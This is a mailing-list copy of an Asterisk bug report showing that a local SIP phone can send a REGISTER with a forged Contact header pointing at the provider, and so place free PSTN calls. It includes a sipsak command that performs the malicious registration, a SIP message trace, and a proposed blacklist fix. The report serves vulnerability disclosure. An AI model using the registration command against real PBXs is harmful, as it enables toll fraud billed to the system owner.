[asterisk-bugs] [Asterisk 0011776]: [authenticaion] in sip.conf: A malicius "Contact" header in REGISTER can get free calls through SIP provider

noreply at bugs.digium.com noreply at bugs.digium.com
Wed Mar 26 07:55:07 CDT 2008 

A NOTE has been added to this issue. 
====================================================================== 
http://bugs.digium.com/view.php?id=11776 
====================================================================== 
Reported By:                ibc
Assigned To:                
====================================================================== 
Project:                    Asterisk
Issue ID:                   11776
Category:                   Channels/chan_sip/Registration
Reproducibility:            always
Severity:                   minor
Priority:                   normal
Status:                     new
Asterisk Version:           1.4.17 
SVN Branch (only for SVN checkouts, not tarball releases): N/A  
SVN Revision (number only!):  
Disclaimer on File?:        N/A 
Request Review:              
====================================================================== 
Date Submitted:             01-16-2008 05:57 CST
Last Modified:              03-26-2008 07:55 CDT
====================================================================== 
Summary:                    [authenticaion] in sip.conf: A malicius "Contact"
header in REGISTER can get free calls through SIP provider
Description: 
Hi, a malicius "Contact" header can be very damaged as I explain in the
following example:


Suppose our Asterisk has configured a SIP provider "sip_provider" with
"realm=sip_provider.com" and a SIP local phone "2001" who is not allowed to
do calls through "sip_provider":


sip.conf:
------------------------------------------
[authentication]
auth = client_number:client_password at sip_provider.com

[sip_provider]
type = peer
host = sip_provider.com

[2001] ; local phone
type = friend
secret = 1234
context = from_phone
------------------------------------------


extensions.conf:
------------------------------------------
[from_phone]
; Just allow to do test calls
exten => 500,1,Echo
exten => 501,1,PlayBack(demo-congrats)
exten => _200X,1,Dial(SIP/${EXTEN}) ; call to himself and other local
phones
------------------------------------------


Note that for the "sip_provider", instead of using "secret" and "username"
in the peer definition we have defined an "auth" in [autheticacion]
section. AFAIK this is perfectly valid.

Note too that "phone" is just allowed to call 500, 501 and 200X (so
calling to 2001 he would call himself).



Now because the owner of 2001 phone is angry he decides to hack the
enterprise PBX by doing it:

  sipsak -U -C "sip:0034999000111 at sip_provider.com:5060" -a "1234" -s
sip:2001 at asterisk_ip

This will cause a malicious registration in Asterisk for the AoR
"sip:2001 at asterisk_ip".

Now this person calls to himself by calling to 2001 extension:

- Asterisk then by the execution of dialplan will do:
    Dial(SIP/2001)

- This will cause an INVITE to the sip_provider and replies like:

* asterisk_ip -> sip_provider.com
INVITE sip:0034999000111 at sip_provider.com:5060 SIP/2.0
From: "asterisk" <sip:asterisk at asterisk_ip>
To: <sip:0034999000111 at sip_provider.com:5060>


* sip_provider.com -> asterisk_ip
SIP/2.0 407 Proxy Authentication Required
Proxy-Authenticate: Digest algorithm=MD5, realm="sip_provider.com",
nonce="1748d3"


* asterisk_ip -> sip_provider.com
INVITE sip:0034999000111 at sip_provider.com:5060 SIP/2.0
From: "asterisk" <sip:asterisk at asterisk_ip>
To: <sip:0034999000111 at sip_provider.com:5060>
Proxy-Authorization: Digest username="client_number",
realm="sip_provider.com", algorithm=MD5,
uri="sip:0034999000111 at sip_provider.com:5060", nonce="1748d3",
response="70d491d8998a961dc"


* sip_provider.com -> asterisk_ip
183 Session Progress

ooohhhhhh !!!


So the malicious user has made a PSTN call by free!
====================================================================== 

---------------------------------------------------------------------- 
 ibc - 03-26-08 07:55  
---------------------------------------------------------------------- 
Note that then Asterisk should match the Contact URI and resolve it to IP
for each call to that AoR since a domain can be altered in the time (a
malicious user could send a REGISTER with "Contact: mydomain.com" and in
that moment "mydomain.com" resolvs to 10.10.10.10, but later it can modify
the DNS and point to a provider).

In OpenSer there is a nice way to handle it: blacklists.
- You set a blacklist with providers IP.
- By default the blacklist is active.
- When OpenSer must do a call it resolves the destination IP and if the IP
is blacklisted it denies the call.
- When the proxy explicitely wants to route a call to a blacklisted ip (a
provider) it deactivates blacklist for that call.

I don't know how it could be implemented in Asterisk, maybe a parameter in
sip.conf:

  [general]
  blacklist = 90.90.90.90, 91.91.91.91

and a new parameter "dissable_blacklist" for peers . If it's set then it
dissables the blacklist when a call is made throught that peer:

  [sip_provider]
  host = sip.sip_provider.com  ; resolvs to 90.90.90.90
  type = peer
  dissable_blacklist = true


So then, a INVITE is only allowed to 90.90.90.90 if the Dial is like:
  Dial(SIP/sip_provider/XXXX)
  or
  Dial(SIP/XXXX at sip_provider)


PD: Note also that in OpenSer there can be more than one blacklist
referred each one by a id or name. 

Issue History 
Date Modified   Username       Field                    Change               
====================================================================== 
03-26-08 07:55  ibc            Note Added: 0084562                          
======================================================================

More information about the asterisk-bugs mailing list